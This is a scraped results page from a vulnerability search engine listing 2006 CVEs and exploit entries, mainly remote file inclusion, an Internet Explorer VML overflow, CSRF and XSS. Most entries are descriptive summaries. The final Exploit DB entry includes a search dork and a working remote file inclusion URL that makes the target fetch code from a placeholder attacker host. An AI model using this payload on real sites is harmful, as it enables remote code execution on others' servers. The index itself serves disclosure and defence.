CVE Search Engine - Security Vulnerabilities and Exploits Search Tool

securityvulns•added 2006/10/23 12:0 a.m.•52 views

Another Mambo module remote inclusion vulneribility

Bug Found by h4ntu http://h4ntu.com batamhacker crew Another Mambo module remote inclusion vulneribility download : http://mamboxchange.com/frs/download.php/1498/MambWeather181.zip bug found in file : MambWeather/Savant2/Savant2Pluginoptions.php ?php / Base plugin class. / global...

0.6AI score

CVE•added 2006/10/18 1:0 a.m.•40 views

CVE-2006-5377

Technical details about CVE-2006-5377 are not provided in the supplied documents. No affected products, root cause, or remediation are disclosed here. Monitor for updates in the connected sources.

9CVSS6.3AI score0.01925EPSS

Exploits0References8Affected Software1

Check Point Advisories•added 2006/10/18 12:0 a.m.•5 views

Internet Explorer VML Rect Fill Method Buffer Overflow (MS06-055; CVE-2006-4868)

Microsoft Internet Explorer is the most widely used Internet browser. Microsoft Internet Explorer fails to handle Vector Markup Language VML tags. VML is a set of XML tags for drawing vector graphics. A remote attacker may trigger this vulnerability to execute arbitrary code on the target system...

Debian CVE•added 2006/10/02 8:0 p.m.•31 views

CVE-2006-5116

Multiple cross-site request forgery CSRF vulnerabilities in phpMyAdmin before 2.9.1-rc1 allow remote attackers to perform unauthorized actions as another user by 1 directly setting a token in the URL though dynamic variable evaluation and 2 unsetting arbitrary variables via the REQUEST array,...

5.1CVSS6.7AI score0.03863EPSS

exploitpack•added 2006/09/29 12:0 a.m.•25 views

Buzlas 2006-1 Full - Archive_Topic.php Remote File Inclusion

Buzlas 2006-1 Full - ArchiveTopic.php Remote File Inclusion source: https://www.securityfocus.com/bid/20511/info Buzlas is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. Exploiting this issue may allow an attacker to compromise the...

7.5AI score

NVD•added 2006/09/27 7:7 p.m.•18 views

CVE-2006-4694

Unspecified vulnerability in PowerPoint in Microsoft Office 2000, Office XP and Office 2003 allows user-assisted attackers to execute arbitrary code via a crafted record in a PPT file, as exploited by malware such as Exploit:Win32/Controlppt.W, Exploit:Win32/Controlppt.X, and...

9.3CVSS7AI score0.46461EPSS

Exploits4References15

securityvulns•added 2006/09/27 12:0 a.m.•41 views

Microsoft Windows / Internet Explorer 0-day vulnerability

Microsoft Vector Graphics Rendering Library vulnerability is used for hidden malware installation...

2.2AI score

Exploits0References3

CVE•added 2006/09/26 1:43 a.m.•59 views

CVE-2006-4990

CVE-2006-4990 describes PHP remote file inclusion vulnerabilities in PhotoPost 4.0–4.6 where an attacker can execute arbitrary PHP code by supplying a URL to the PP_PATH parameter across multiple PHP scripts (e.g., zipndownload.php and others). The issue enables code execution via network access ...

7.5CVSS7.6AI score0.0371EPSS

Exploits0References32Affected Software1

Tenable Nessus•added 2006/09/26 12:0 a.m.•54 views

MS06-055: Vulnerability in Vector Markup Language Could Allow Remote Code Execution (925486)

The remote host is running a version of Internet Explorer or Outlook Express that is vulnerable to a bug in the Vector Markup Language VML handling routine that could allow an attacker execute arbitrary code on the remote host by sending a specially crafted email or by luring a user on the remote...

9.3CVSS6.2AI score0.68436EPSS

Exploits7References2

VulnCheck KEV•added 2006/09/26 12:0 a.m.•1 views

VulnCheck KEV: CVE-2006-4868

Stack-based buffer overflow in the Vector Graphics Rendering engine vgx.dll, as used in Microsoft Outlook and Internet Explorer 6.0 on Windows XP SP2, and possibly other versions, allows remote attackers to execute arbitrary code via a Vector Markup Language VML file with a long fill...

9.3CVSS6.5AI score0.68436EPSS

Exploits7References1

Saint•added 2006/09/20 12:0 a.m.•26 views

Internet Explorer VML rect fill buffer overflow

Added: 09/20/2006 CVE: CVE-2006-4868 BID: 20096 OSVDB: 28946 Background Vector Markup Language VML is an XML-based format for vector graphics. Problem A buffer overflow in Internet Explorer when processing VML code allows remote command execution using a long fill parameter within a rect tag...

Saint•added 2006/09/20 12:0 a.m.•49 views

Internet Explorer VML rect fill buffer overflow

Saint•added 2006/09/20 12:0 a.m.•24 views

Internet Explorer VML rect fill buffer overflow

NVD•added 2006/09/19 7:7 p.m.•32 views

CVE-2006-4868

9.3CVSS7.8AI score0.68436EPSS

Exploits7References21

CVE•added 2006/09/19 7:0 p.m.•80 views

CVE-2006-4868

CVE-2006-4868: A stack-based buffer overflow in VGX.dll (VML processing) used by Microsoft Outlook and Internet Explorer on Windows XP SP2 enables remote code execution via a crafted VML rect tag with a long fill parameter. Affected: Internet Explorer/VML handling. Impact per sources: arbitrary c...

9.3CVSS7.7AI score0.68436EPSS

Exploits7References21Affected Software2

Exploit DB•added 2006/09/13 12:0 a.m.•39 views

e107 website system 0.7.5 - 'search.php?Query String (PATH_INFO)' Cross-Site Scripting

source: https://www.securityfocus.com/bid/19997/info e107 CMS is prone to multiple cross-site scripting vulnerabilities because the application fails to sanitize user-supplied input. An attacker may levearge this issue to have arbitrary script code execute in the browser of an unsuspecting user i...

7.4AI score

Exploit DB•added 2006/07/24 12:0 a.m.•48 views

Mambo Component PrinceClan Chess 0.8 - Remote File Inclusion

pcchess Component - dork : index.php?option=compcchess - exploit : http://target/path/components/compcchess/include.pcchess.php?mosConfigabsolutepath=http://attacker/cmd.txt?&cmd=ls milw0rm.com 2006-07-24...

7.4AI score